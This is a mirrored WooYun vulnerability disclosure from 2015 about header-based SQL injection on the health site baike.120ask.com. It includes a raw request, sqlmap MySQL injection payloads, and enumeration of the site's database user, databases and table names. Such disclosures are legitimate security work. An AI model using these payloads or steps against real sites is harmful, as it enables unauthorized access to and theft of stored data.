乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-29: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://baike.120ask.com/中文健康百科
heads 头注入,多处存在,不一一贴了.举一个
GET /art/26394 HTTP/1.1User-Agent: *X-Requested-With: XMLHttpRequestReferer: http://baike.120ask.comCookie: CNZZDATA30036369=cnzz_eid%3D1138545182-1448544156-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1448544156; Hm_lvt_df2d59d646ef3ec9cbf82753b6f92840=1448547737; Hm_lpvt_df2d59d646ef3ec9cbf82753b6f92840=1448547737Host: baike.120ask.comConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
User-Agent 存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: User-Agent #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: '||(SELECT 'QqFJ' FROM DUAL WHERE 2149=2149 AND MAKE_SET(4313=4313,5395))||' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: '||(SELECT 'Gsgj' FROM DUAL WHERE 4390=4390 AND (SELECT 4087 FROM(SELECT COUNT(*),CONCAT(0x717a767871,(SELECT (ELT(4087=4087,1))),0x717a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||' Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: '||(SELECT 'uEvx' FROM DUAL WHERE 9303=9303 AND (SELECT * FROM (SELECT(SLEEP(5)))fmWF))||'---web application technology: Nginxback-end DBMS: MySQL 5.0current user: '120_hashtag@%'current database: 'hashtag'current user is DBA: Falseavailable databases [3]:[*] hashtag[*] information_schema[*] test
表数据太多,贴一部分
Database: hashtag[192 tables]+----------------------------------+| 39_jibing || area_info_map || assignments || baiduspider_scan || base_disease || base_doctor || base_doctor_relation || base_hospital || base_symptom || c_article || c_article_lists || c_department || c_doctor || c_hospital || gtt_haodf_department || gtt_haodf_doctor || gtt_haodf_hospital || gtt_qiuqi_hospital || gtt_qiuyi_department || gtt_qiuyi_doctor || gtt_qqyy_department || gtt_qqyy_doctor || gtt_qqyy_hospital || gz_temp || hospital_ad_area_show || hospital_class || hospital_class_edit || hospital_class_map || hospital_doctor || hospital_doctor_edit || hospital_doctor_evaluate || hospital_doctor_server || hospital_doctor_title || hospital_evaluate_ip || hospital_evaluate_reply || hospital_img || hospital_info || hospital_info_apply || hospital_info_bindask || hospital_info_edit || hospital_linshi || hospital_logs || hospital_muster_rank || hospital_post || hospital_post_fuzhu || hospital_server || hospital_tags_map || hospital_tags_map_edit || hospital_tags_map_kong || hospital_type || hospital_weixin || hospital_zxmr_doctor_map || hospital_zxmr_list_map || hospital_zxmr_map || ill_comment || ill_images || ill_info || itemchildren || items || jy_aduser || jy_agency || jy_agency_worklog || jy_analysis_temp || jy_art_index || jy_article || jy_audit_user || jy_author_grade || jy_bad_article || jy_balance_log || jy_boost_store || jy_class || jy_class_art_tj || jy_comm |
危害等级:无影响厂商忽略
忽略时间:2015-12-04 11:00
漏洞Rank:4 (WooYun评价)
暂无